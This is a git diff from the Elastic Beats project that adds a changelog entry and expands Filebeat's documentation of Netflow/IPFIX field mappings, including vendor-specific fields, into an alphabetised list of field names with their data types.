b570ea92379b..07f4ab5d8624 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -833,6 +833,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d removing unsupported processors. {pull}23763[23763] - Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] - Added string splitting for httpjson input {pull}24022[24022] +- Added field mappings for Netflow/IPFIX vendor fields that are known to Filebeat. {issue}23771[23771] *Heartbeat* diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index e47e37fc1948..b94b9e22a0f7 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -94953,3125 +94953,9215 @@ type: integer -- -*`netflow.octet_delta_count`*:: +*`netflow.absolute_error`*:: + -- -type: long +type: double -- -*`netflow.packet_delta_count`*:: +*`netflow.address_pool_high_threshold`*:: + -- type: long -- -*`netflow.delta_flow_count`*:: +*`netflow.address_pool_low_threshold`*:: + -- type: long -- -*`netflow.protocol_identifier`*:: +*`netflow.address_port_mapping_high_threshold`*:: + -- -type: short +type: long -- -*`netflow.ip_class_of_service`*:: +*`netflow.address_port_mapping_low_threshold`*:: + -- -type: short +type: long -- -*`netflow.tcp_control_bits`*:: +*`netflow.address_port_mapping_per_user_high_threshold`*:: + -- -type: integer +type: long -- -*`netflow.source_transport_port`*:: +*`netflow.afc_protocol`*:: + -- type: integer -- -*`netflow.source_ipv4_address`*:: +*`netflow.afc_protocol_name`*:: + -- -type: ip +type: keyword -- -*`netflow.source_ipv4_prefix_length`*:: +*`netflow.anonymization_flags`*:: + -- -type: short +type: integer -- -*`netflow.ingress_interface`*:: +*`netflow.anonymization_technique`*:: + -- -type: long +type: integer -- -*`netflow.destination_transport_port`*:: +*`netflow.application_business-relevance`*:: + -- -type: integer +type: long -- -*`netflow.destination_ipv4_address`*:: +*`netflow.application_category_name`*:: + -- -type: ip +type: keyword -- -*`netflow.destination_ipv4_prefix_length`*:: +*`netflow.application_description`*:: + -- -type: short +type: keyword -- -*`netflow.egress_interface`*:: +*`netflow.application_group_name`*:: + -- -type: long +type: keyword -- -*`netflow.ip_next_hop_ipv4_address`*:: +*`netflow.application_http_uri_statistics`*:: + -- -type: ip +type: short -- -*`netflow.bgp_source_as_number`*:: +*`netflow.application_http_user-agent`*:: + -- -type: long +type: short -- -*`netflow.bgp_destination_as_number`*:: +*`netflow.application_id`*:: + -- -type: long +type: short -- -*`netflow.bgp_next_hop_ipv4_address`*:: +*`netflow.application_name`*:: + -- -type: ip +type: keyword -- -*`netflow.post_mcast_packet_delta_count`*:: +*`netflow.application_sub_category_name`*:: + -- -type: long +type: keyword -- -*`netflow.post_mcast_octet_delta_count`*:: +*`netflow.application_traffic-class`*:: + -- type: long -- -*`netflow.flow_end_sys_up_time`*:: +*`netflow.art_client_network_time_maximum`*:: + -- type: long -- -*`netflow.flow_start_sys_up_time`*:: +*`netflow.art_client_network_time_minimum`*:: + -- type: long -- -*`netflow.post_octet_delta_count`*:: +*`netflow.art_client_network_time_sum`*:: + -- type: long -- -*`netflow.post_packet_delta_count`*:: +*`netflow.art_clientpackets`*:: + -- type: long -- -*`netflow.minimum_ip_total_length`*:: +*`netflow.art_count_late_responses`*:: + -- type: long -- -*`netflow.maximum_ip_total_length`*:: +*`netflow.art_count_new_connections`*:: + -- type: long -- -*`netflow.source_ipv6_address`*:: +*`netflow.art_count_responses`*:: + -- -type: ip +type: long -- -*`netflow.destination_ipv6_address`*:: +*`netflow.art_count_responses_histogram_bucket1`*:: + -- -type: ip +type: long -- -*`netflow.source_ipv6_prefix_length`*:: +*`netflow.art_count_responses_histogram_bucket2`*:: + -- -type: short +type: long -- -*`netflow.destination_ipv6_prefix_length`*:: +*`netflow.art_count_responses_histogram_bucket3`*:: + -- -type: short +type: long -- -*`netflow.flow_label_ipv6`*:: +*`netflow.art_count_responses_histogram_bucket4`*:: + -- type: long -- -*`netflow.icmp_type_code_ipv4`*:: +*`netflow.art_count_responses_histogram_bucket5`*:: + -- -type: integer +type: long -- -*`netflow.igmp_type`*:: +*`netflow.art_count_responses_histogram_bucket6`*:: + -- -type: short +type: long -- -*`netflow.sampling_interval`*:: +*`netflow.art_count_responses_histogram_bucket7`*:: + -- type: long -- -*`netflow.sampling_algorithm`*:: +*`netflow.art_count_retransmissions`*:: + -- -type: short +type: long -- -*`netflow.flow_active_timeout`*:: +*`netflow.art_count_transactions`*:: + -- -type: integer +type: long -- -*`netflow.flow_idle_timeout`*:: +*`netflow.art_network_time_maximum`*:: + -- -type: integer +type: long -- -*`netflow.engine_type`*:: +*`netflow.art_network_time_minimum`*:: + -- -type: short +type: long -- -*`netflow.engine_id`*:: +*`netflow.art_network_time_sum`*:: + -- -type: short +type: long -- -*`netflow.exported_octet_total_count`*:: +*`netflow.art_response_time_maximum`*:: + -- type: long -- -*`netflow.exported_message_total_count`*:: +*`netflow.art_response_time_minimum`*:: + -- type: long -- -*`netflow.exported_flow_record_total_count`*:: +*`netflow.art_response_time_sum`*:: + -- type: long -- -*`netflow.ipv4_router_sc`*:: +*`netflow.art_server_network_time_maximum`*:: + -- -type: ip +type: long -- -*`netflow.source_ipv4_prefix`*:: +*`netflow.art_server_network_time_minimum`*:: + -- -type: ip +type: long -- -*`netflow.destination_ipv4_prefix`*:: +*`netflow.art_server_network_time_sum`*:: + -- -type: ip +type: long -- -*`netflow.mpls_top_label_type`*:: +*`netflow.art_server_response_time_maximum`*:: + -- -type: short +type: long -- -*`netflow.mpls_top_label_ipv4_address`*:: +*`netflow.art_server_response_time_minimum`*:: + -- -type: ip +type: long -- -*`netflow.sampler_id`*:: +*`netflow.art_server_response_time_sum`*:: + -- -type: short +type: long -- -*`netflow.sampler_mode`*:: +*`netflow.art_serverpackets`*:: + -- -type: short +type: long -- -*`netflow.sampler_random_interval`*:: +*`netflow.art_total_response_time_maximum`*:: + -- type: long -- -*`netflow.class_id`*:: +*`netflow.art_total_response_time_minimum`*:: + -- type: long -- -*`netflow.minimum_ttl`*:: +*`netflow.art_total_response_time_sum`*:: + -- -type: short +type: long -- -*`netflow.maximum_ttl`*:: +*`netflow.art_total_transaction_time_maximum`*:: + -- -type: short +type: long -- -*`netflow.fragment_identification`*:: +*`netflow.art_total_transaction_time_minimum`*:: + -- type: long -- -*`netflow.post_ip_class_of_service`*:: +*`netflow.art_total_transaction_time_sum`*:: + -- -type: short +type: long -- -*`netflow.source_mac_address`*:: +*`netflow.assembled_fragment_count`*:: + -- -type: keyword +type: long -- -*`netflow.post_destination_mac_address`*:: +*`netflow.audit_counter`*:: + -- -type: keyword +type: long -- -*`netflow.vlan_id`*:: +*`netflow.average_interarrival_time`*:: + -- -type: integer +type: long -- -*`netflow.post_vlan_id`*:: +*`netflow.bgp_destination_as_number`*:: + -- -type: integer +type: long -- -*`netflow.ip_version`*:: +*`netflow.bgp_next_adjacent_as_number`*:: + -- -type: short +type: long -- -*`netflow.flow_direction`*:: +*`netflow.bgp_next_hop_ipv4_address`*:: + -- -type: short +type: ip -- -*`netflow.ip_next_hop_ipv6_address`*:: +*`netflow.bgp_next_hop_ipv6_address`*:: + -- type: ip -- -*`netflow.bgp_next_hop_ipv6_address`*:: +*`netflow.bgp_prev_adjacent_as_number`*:: + -- -type: ip +type: long -- -*`netflow.ipv6_extension_headers`*:: +*`netflow.bgp_source_as_number`*:: + -- type: long -- -*`netflow.mpls_top_label_stack_section`*:: +*`netflow.bgp_validity_state`*:: + -- type: short -- -*`netflow.mpls_label_stack_section2`*:: +*`netflow.biflow_direction`*:: + -- type: short -- -*`netflow.mpls_label_stack_section3`*:: +*`netflow.bind_ipv4_address`*:: + -- -type: short +type: ip -- -*`netflow.mpls_label_stack_section4`*:: +*`netflow.bind_transport_port`*:: + -- -type: short +type: integer -- -*`netflow.mpls_label_stack_section5`*:: +*`netflow.class_id`*:: + -- -type: short +type: long -- -*`netflow.mpls_label_stack_section6`*:: +*`netflow.class_name`*:: + -- -type: short +type: keyword -- -*`netflow.mpls_label_stack_section7`*:: +*`netflow.classification_engine_id`*:: + -- type: short -- -*`netflow.mpls_label_stack_section8`*:: +*`netflow.collection_time_milliseconds`*:: + -- -type: short +type: date -- -*`netflow.mpls_label_stack_section9`*:: +*`netflow.collector_certificate`*:: + -- type: short -- -*`netflow.mpls_label_stack_section10`*:: +*`netflow.collector_ipv4_address`*:: + -- -type: short +type: ip -- -*`netflow.destination_mac_address`*:: +*`netflow.collector_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`netflow.post_source_mac_address`*:: +*`netflow.collector_transport_port`*:: + -- -type: keyword +type: integer -- -*`netflow.interface_name`*:: +*`netflow.common_properties_id`*:: + -- -type: keyword +type: long -- -*`netflow.interface_description`*:: +*`netflow.confidence_level`*:: + -- -type: keyword +type: double -- -*`netflow.sampler_name`*:: +*`netflow.conn_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`netflow.octet_total_count`*:: +*`netflow.conn_transport_port`*:: + -- -type: long +type: integer -- -*`netflow.packet_total_count`*:: +*`netflow.connection_sum_duration_seconds`*:: + -- type: long -- -*`netflow.flags_and_sampler_id`*:: +*`netflow.connection_transaction_id`*:: + -- type: long -- -*`netflow.fragment_offset`*:: +*`netflow.conntrack_id`*:: + -- -type: integer +type: long -- -*`netflow.forwarding_status`*:: +*`netflow.data_byte_count`*:: + -- -type: short +type: long -- -*`netflow.mpls_vpn_route_distinguisher`*:: +*`netflow.data_link_frame_section`*:: + -- type: short -- -*`netflow.mpls_top_label_prefix_length`*:: +*`netflow.data_link_frame_size`*:: + -- -type: short +type: integer -- -*`netflow.src_traffic_index`*:: +*`netflow.data_link_frame_type`*:: + -- -type: long +type: integer -- -*`netflow.dst_traffic_index`*:: +*`netflow.data_records_reliability`*:: + -- -type: long +type: boolean -- -*`netflow.application_description`*:: +*`netflow.delta_flow_count`*:: + -- -type: keyword +type: long -- -*`netflow.application_id`*:: +*`netflow.destination_ipv4_address`*:: + -- -type: short +type: ip -- -*`netflow.application_name`*:: +*`netflow.destination_ipv4_prefix`*:: ++ +-- +type: ip + +-- + +*`netflow.destination_ipv4_prefix_length`*:: ++ +-- +type: short + +-- + +*`netflow.destination_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.destination_ipv6_prefix`*:: ++ +-- +type: ip + +-- + +*`netflow.destination_ipv6_prefix_length`*:: ++ +-- +type: short + +-- + +*`netflow.destination_mac_address`*:: ++ +-- +type: keyword + +-- + +*`netflow.destination_transport_port`*:: ++ +-- +type: integer + +-- + +*`netflow.digest_hash_value`*:: ++ +-- +type: long + +-- + +*`netflow.distinct_count_of_destination_ip_address`*:: ++ +-- +type: long + +-- + +*`netflow.distinct_count_of_destination_ipv4_address`*:: ++ +-- +type: long + +-- + +*`netflow.distinct_count_of_destination_ipv6_address`*:: ++ +-- +type: long + +-- + +*`netflow.distinct_count_of_source_ip_address`*:: ++ +-- +type: long + +-- + +*`netflow.distinct_count_of_source_ipv4_address`*:: ++ +-- +type: long + +-- + +*`netflow.distinct_count_of_source_ipv6_address`*:: ++ +-- +type: long + +-- + +*`netflow.dns_authoritative`*:: ++ +-- +type: short + +-- + +*`netflow.dns_cname`*:: ++ +-- +type: keyword + +-- + +*`netflow.dns_id`*:: ++ +-- +type: integer + +-- + +*`netflow.dns_mx_exchange`*:: ++ +-- +type: keyword + +-- + +*`netflow.dns_mx_preference`*:: ++ +-- +type: integer + +-- + +*`netflow.dns_nsd_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.dns_nx_domain`*:: ++ +-- +type: short + +-- + +*`netflow.dns_ptrd_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.dns_qname`*:: ++ +-- +type: keyword + +-- + +*`netflow.dns_qr_type`*:: ++ +-- +type: integer + +-- + +*`netflow.dns_query_response`*:: ++ +-- +type: short + +-- + +*`netflow.dns_rr_section`*:: ++ +-- +type: short + +-- + +*`netflow.dns_soa_expire`*:: ++ +-- +type: long + +-- + +*`netflow.dns_soa_minimum`*:: ++ +-- +type: long + +-- + +*`netflow.dns_soa_refresh`*:: ++ +-- +type: long + +-- + +*`netflow.dns_soa_retry`*:: ++ +-- +type: long + +-- + +*`netflow.dns_soa_serial`*:: ++ +-- +type: long + +-- + +*`netflow.dns_soam_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.dns_soar_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.dns_srv_port`*:: ++ +-- +type: integer + +-- + +*`netflow.dns_srv_priority`*:: ++ +-- +type: integer + +-- + +*`netflow.dns_srv_target`*:: ++ +-- +type: integer + +-- + +*`netflow.dns_srv_weight`*:: ++ +-- +type: integer + +-- + +*`netflow.dns_ttl`*:: ++ +-- +type: long + +-- + +*`netflow.dns_txt_data`*:: ++ +-- +type: keyword + +-- + +*`netflow.dot1q_customer_dei`*:: ++ +-- +type: boolean + +-- + +*`netflow.dot1q_customer_destination_mac_address`*:: ++ +-- +type: keyword + +-- + +*`netflow.dot1q_customer_priority`*:: ++ +-- +type: short + +-- + +*`netflow.dot1q_customer_source_mac_address`*:: ++ +-- +type: keyword + +-- + +*`netflow.dot1q_customer_vlan_id`*:: ++ +-- +type: integer + +-- + +*`netflow.dot1q_dei`*:: ++ +-- +type: boolean + +-- + +*`netflow.dot1q_priority`*:: ++ +-- +type: short + +-- + +*`netflow.dot1q_service_instance_id`*:: ++ +-- +type: long + +-- + +*`netflow.dot1q_service_instance_priority`*:: ++ +-- +type: short + +-- + +*`netflow.dot1q_service_instance_tag`*:: ++ +-- +type: short + +-- + +*`netflow.dot1q_vlan_id`*:: ++ +-- +type: integer + +-- + +*`netflow.dropped_layer2_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.dropped_layer2_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.dropped_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.dropped_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.dropped_packet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.dropped_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.dst_traffic_index`*:: ++ +-- +type: long + +-- + +*`netflow.egress_broadcast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.egress_interface`*:: ++ +-- +type: long + +-- + +*`netflow.egress_interface_type`*:: ++ +-- +type: long + +-- + +*`netflow.egress_physical_interface`*:: ++ +-- +type: long + +-- + +*`netflow.egress_unicast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.egress_vrfid`*:: ++ +-- +type: long + +-- + +*`netflow.encrypted_technology`*:: ++ +-- +type: keyword + +-- + +*`netflow.engine_id`*:: ++ +-- +type: short + +-- + +*`netflow.engine_type`*:: ++ +-- +type: short + +-- + +*`netflow.ethernet_header_length`*:: ++ +-- +type: short + +-- + +*`netflow.ethernet_payload_length`*:: ++ +-- +type: integer + +-- + +*`netflow.ethernet_total_length`*:: ++ +-- +type: integer + +-- + +*`netflow.ethernet_type`*:: ++ +-- +type: integer + +-- + +*`netflow.expired_fragment_count`*:: ++ +-- +type: long + +-- + +*`netflow.export_interface`*:: ++ +-- +type: long + +-- + +*`netflow.export_protocol_version`*:: ++ +-- +type: short + +-- + +*`netflow.export_sctp_stream_id`*:: ++ +-- +type: integer + +-- + +*`netflow.export_transport_protocol`*:: ++ +-- +type: short + +-- + +*`netflow.exported_flow_record_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.exported_message_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.exported_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.exporter_certificate`*:: ++ +-- +type: short + +-- + +*`netflow.exporter_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.exporter_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.exporter_transport_port`*:: ++ +-- +type: integer + +-- + +*`netflow.exporting_process_id`*:: ++ +-- +type: long + +-- + +*`netflow.external_address_realm`*:: ++ +-- +type: short + +-- + +*`netflow.firewall_event`*:: ++ +-- +type: short + +-- + +*`netflow.first_eight_non_empty_packet_directions`*:: ++ +-- +type: short + +-- + +*`netflow.first_non_empty_packet_size`*:: ++ +-- +type: integer + +-- + +*`netflow.first_packet_banner`*:: ++ +-- +type: keyword + +-- + +*`netflow.flags_and_sampler_id`*:: ++ +-- +type: long + +-- + +*`netflow.flow_active_timeout`*:: ++ +-- +type: integer + +-- + +*`netflow.flow_attributes`*:: ++ +-- +type: integer + +-- + +*`netflow.flow_direction`*:: ++ +-- +type: short + +-- + +*`netflow.flow_duration_microseconds`*:: ++ +-- +type: long + +-- + +*`netflow.flow_duration_milliseconds`*:: ++ +-- +type: long + +-- + +*`netflow.flow_end_delta_microseconds`*:: ++ +-- +type: long + +-- + +*`netflow.flow_end_microseconds`*:: ++ +-- +type: date + +-- + +*`netflow.flow_end_milliseconds`*:: ++ +-- +type: date + +-- + +*`netflow.flow_end_nanoseconds`*:: ++ +-- +type: date + +-- + +*`netflow.flow_end_reason`*:: ++ +-- +type: short + +-- + +*`netflow.flow_end_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.flow_end_sys_up_time`*:: ++ +-- +type: long + +-- + +*`netflow.flow_id`*:: ++ +-- +type: long + +-- + +*`netflow.flow_idle_timeout`*:: ++ +-- +type: integer + +-- + +*`netflow.flow_key_indicator`*:: ++ +-- +type: long + +-- + +*`netflow.flow_label_ipv6`*:: ++ +-- +type: long + +-- + +*`netflow.flow_sampling_time_interval`*:: ++ +-- +type: long + +-- + +*`netflow.flow_sampling_time_spacing`*:: ++ +-- +type: long + +-- + +*`netflow.flow_selected_flow_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.flow_selected_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.flow_selected_packet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.flow_selector_algorithm`*:: ++ +-- +type: integer + +-- + +*`netflow.flow_start_delta_microseconds`*:: ++ +-- +type: long + +-- + +*`netflow.flow_start_microseconds`*:: ++ +-- +type: date + +-- + +*`netflow.flow_start_milliseconds`*:: ++ +-- +type: date + +-- + +*`netflow.flow_start_nanoseconds`*:: ++ +-- +type: date + +-- + +*`netflow.flow_start_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.flow_start_sys_up_time`*:: ++ +-- +type: long + +-- + +*`netflow.flow_table_flush_event_count`*:: ++ +-- +type: long + +-- + +*`netflow.flow_table_peak_count`*:: ++ +-- +type: long + +-- + +*`netflow.forwarding_status`*:: ++ +-- +type: short + +-- + +*`netflow.fragment_flags`*:: ++ +-- +type: short + +-- + +*`netflow.fragment_identification`*:: ++ +-- +type: long + +-- + +*`netflow.fragment_offset`*:: ++ +-- +type: integer + +-- + +*`netflow.fw_blackout_secs`*:: ++ +-- +type: long + +-- + +*`netflow.fw_configured_value`*:: ++ +-- +type: long + +-- + +*`netflow.fw_cts_src_sgt`*:: ++ +-- +type: long + +-- + +*`netflow.fw_event_level`*:: ++ +-- +type: long + +-- + +*`netflow.fw_event_level_id`*:: ++ +-- +type: long + +-- + +*`netflow.fw_ext_event`*:: ++ +-- +type: integer + +-- + +*`netflow.fw_ext_event_alt`*:: ++ +-- +type: long + +-- + +*`netflow.fw_ext_event_desc`*:: ++ +-- +type: keyword + +-- + +*`netflow.fw_half_open_count`*:: ++ +-- +type: long + +-- + +*`netflow.fw_half_open_high`*:: ++ +-- +type: long + +-- + +*`netflow.fw_half_open_rate`*:: ++ +-- +type: long + +-- + +*`netflow.fw_max_sessions`*:: ++ +-- +type: long + +-- + +*`netflow.fw_rule`*:: ++ +-- +type: keyword + +-- + +*`netflow.fw_summary_pkt_count`*:: ++ +-- +type: long + +-- + +*`netflow.fw_zone_pair_id`*:: ++ +-- +type: long + +-- + +*`netflow.fw_zone_pair_name`*:: ++ +-- +type: long + +-- + +*`netflow.global_address_mapping_high_threshold`*:: ++ +-- +type: long + +-- + +*`netflow.gre_key`*:: ++ +-- +type: long + +-- + +*`netflow.hash_digest_output`*:: ++ +-- +type: boolean + +-- + +*`netflow.hash_flow_domain`*:: ++ +-- +type: integer + +-- + +*`netflow.hash_initialiser_value`*:: ++ +-- +type: long + +-- + +*`netflow.hash_ip_payload_offset`*:: ++ +-- +type: long + +-- + +*`netflow.hash_ip_payload_size`*:: ++ +-- +type: long + +-- + +*`netflow.hash_output_range_max`*:: ++ +-- +type: long + +-- + +*`netflow.hash_output_range_min`*:: ++ +-- +type: long + +-- + +*`netflow.hash_selected_range_max`*:: ++ +-- +type: long + +-- + +*`netflow.hash_selected_range_min`*:: ++ +-- +type: long + +-- + +*`netflow.http_content_type`*:: ++ +-- +type: keyword + +-- + +*`netflow.http_message_version`*:: ++ +-- +type: keyword + +-- + +*`netflow.http_reason_phrase`*:: ++ +-- +type: keyword + +-- + +*`netflow.http_request_host`*:: ++ +-- +type: keyword + +-- + +*`netflow.http_request_method`*:: ++ +-- +type: keyword + +-- + +*`netflow.http_request_target`*:: ++ +-- +type: keyword + +-- + +*`netflow.http_status_code`*:: ++ +-- +type: integer + +-- + +*`netflow.http_user_agent`*:: ++ +-- +type: keyword + +-- + +*`netflow.icmp_code_ipv4`*:: ++ +-- +type: short + +-- + +*`netflow.icmp_code_ipv6`*:: ++ +-- +type: short + +-- + +*`netflow.icmp_type_code_ipv4`*:: ++ +-- +type: integer + +-- + +*`netflow.icmp_type_code_ipv6`*:: ++ +-- +type: integer + +-- + +*`netflow.icmp_type_ipv4`*:: ++ +-- +type: short + +-- + +*`netflow.icmp_type_ipv6`*:: ++ +-- +type: short + +-- + +*`netflow.igmp_type`*:: ++ +-- +type: short + +-- + +*`netflow.ignored_data_record_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.ignored_layer2_frame_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.ignored_layer2_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.ignored_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.ignored_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.information_element_data_type`*:: ++ +-- +type: short + +-- + +*`netflow.information_element_description`*:: ++ +-- +type: keyword + +-- + +*`netflow.information_element_id`*:: ++ +-- +type: integer + +-- + +*`netflow.information_element_index`*:: ++ +-- +type: integer + +-- + +*`netflow.information_element_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.information_element_range_begin`*:: ++ +-- +type: long + +-- + +*`netflow.information_element_range_end`*:: ++ +-- +type: long + +-- + +*`netflow.information_element_semantics`*:: ++ +-- +type: short + +-- + +*`netflow.information_element_units`*:: ++ +-- +type: integer + +-- + +*`netflow.ingress_broadcast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.ingress_interface`*:: ++ +-- +type: long + +-- + +*`netflow.ingress_interface_type`*:: ++ +-- +type: long + +-- + +*`netflow.ingress_multicast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.ingress_physical_interface`*:: ++ +-- +type: long + +-- + +*`netflow.ingress_unicast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.ingress_vrfid`*:: ++ +-- +type: long + +-- + +*`netflow.initial_tcp_flags`*:: ++ +-- +type: short + +-- + +*`netflow.initiator_octets`*:: ++ +-- +type: long + +-- + +*`netflow.initiator_packets`*:: ++ +-- +type: long + +-- + +*`netflow.interface_description`*:: ++ +-- +type: keyword + +-- + +*`netflow.interface_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.intermediate_process_id`*:: ++ +-- +type: long + +-- + +*`netflow.internal_address_realm`*:: ++ +-- +type: short + +-- + +*`netflow.ip_class_of_service`*:: ++ +-- +type: short + +-- + +*`netflow.ip_diff_serv_code_point`*:: ++ +-- +type: short + +-- + +*`netflow.ip_header_length`*:: ++ +-- +type: short + +-- + +*`netflow.ip_header_packet_section`*:: ++ +-- +type: short + +-- + +*`netflow.ip_next_hop_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.ip_next_hop_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.ip_payload_length`*:: ++ +-- +type: long + +-- + +*`netflow.ip_payload_packet_section`*:: ++ +-- +type: short + +-- + +*`netflow.ip_precedence`*:: ++ +-- +type: short + +-- + +*`netflow.ip_sec_spi`*:: ++ +-- +type: long + +-- + +*`netflow.ip_total_length`*:: ++ +-- +type: long + +-- + +*`netflow.ip_ttl`*:: ++ +-- +type: short + +-- + +*`netflow.ip_version`*:: ++ +-- +type: short + +-- + +*`netflow.ipv4_ihl`*:: ++ +-- +type: short + +-- + +*`netflow.ipv4_options`*:: ++ +-- +type: long + +-- + +*`netflow.ipv4_router_sc`*:: ++ +-- +type: ip + +-- + +*`netflow.ipv6_extension_headers`*:: ++ +-- +type: long + +-- + +*`netflow.is_multicast`*:: ++ +-- +type: short + +-- + +*`netflow.ixia_browser_id`*:: ++ +-- +type: short + +-- + +*`netflow.ixia_browser_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_device_id`*:: ++ +-- +type: short + +-- + +*`netflow.ixia_device_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dns_answer`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dns_classes`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dns_query`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dns_record_txt`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dst_as_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dst_city_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dst_country_code`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dst_country_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dst_latitude`*:: ++ +-- +type: float + +-- + +*`netflow.ixia_dst_longitude`*:: ++ +-- +type: float + +-- + +*`netflow.ixia_dst_region_code`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_dst_region_node`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_encrypt_cipher`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_encrypt_key_length`*:: ++ +-- +type: integer + +-- + +*`netflow.ixia_encrypt_type`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_http_host_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_http_uri`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_http_user_agent`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_imsi_subscriber`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_l7_app_id`*:: ++ +-- +type: long + +-- + +*`netflow.ixia_l7_app_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_latency`*:: ++ +-- +type: long + +-- + +*`netflow.ixia_rev_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.ixia_rev_packet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.ixia_src_as_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_src_city_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_src_country_code`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_src_country_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_src_latitude`*:: ++ +-- +type: float + +-- + +*`netflow.ixia_src_longitude`*:: ++ +-- +type: float + +-- + +*`netflow.ixia_src_region_code`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_src_region_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_threat_ipv4`*:: ++ +-- +type: ip + +-- + +*`netflow.ixia_threat_ipv6`*:: ++ +-- +type: ip + +-- + +*`netflow.ixia_threat_type`*:: ++ +-- +type: keyword + +-- + +*`netflow.large_packet_count`*:: ++ +-- +type: long + +-- + +*`netflow.layer2_frame_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.layer2_frame_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.layer2_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.layer2_octet_delta_sum_of_squares`*:: ++ +-- +type: long + +-- + +*`netflow.layer2_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.layer2_octet_total_sum_of_squares`*:: ++ +-- +type: long + +-- + +*`netflow.layer2_segment_id`*:: ++ +-- +type: long + +-- + +*`netflow.layer2packet_section_data`*:: ++ +-- +type: short + +-- + +*`netflow.layer2packet_section_offset`*:: ++ +-- +type: integer + +-- + +*`netflow.layer2packet_section_size`*:: ++ +-- +type: integer + +-- + +*`netflow.line_card_id`*:: ++ +-- +type: long + +-- + +*`netflow.log_op`*:: ++ +-- +type: short + +-- + +*`netflow.lower_ci_limit`*:: ++ +-- +type: double + +-- + +*`netflow.mark`*:: ++ +-- +type: long + +-- + +*`netflow.max_bib_entries`*:: ++ +-- +type: long + +-- + +*`netflow.max_entries_per_user`*:: ++ +-- +type: long + +-- + +*`netflow.max_export_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.max_flow_end_microseconds`*:: ++ +-- +type: date + +-- + +*`netflow.max_flow_end_milliseconds`*:: ++ +-- +type: date + +-- + +*`netflow.max_flow_end_nanoseconds`*:: ++ +-- +type: date + +-- + +*`netflow.max_flow_end_seconds`*:: ++ +-- +type: date + +-- + +*`netflow.max_fragments_pending_reassembly`*:: ++ +-- +type: long + +-- + +*`netflow.max_packet_size`*:: ++ +-- +type: integer + +-- + +*`netflow.max_session_entries`*:: ++ +-- +type: long + +-- + +*`netflow.max_subscribers`*:: ++ +-- +type: long + +-- + +*`netflow.maximum_ip_total_length`*:: ++ +-- +type: long + +-- + +*`netflow.maximum_layer2_total_length`*:: ++ +-- +type: long + +-- + +*`netflow.maximum_ttl`*:: ++ +-- +type: short + +-- + 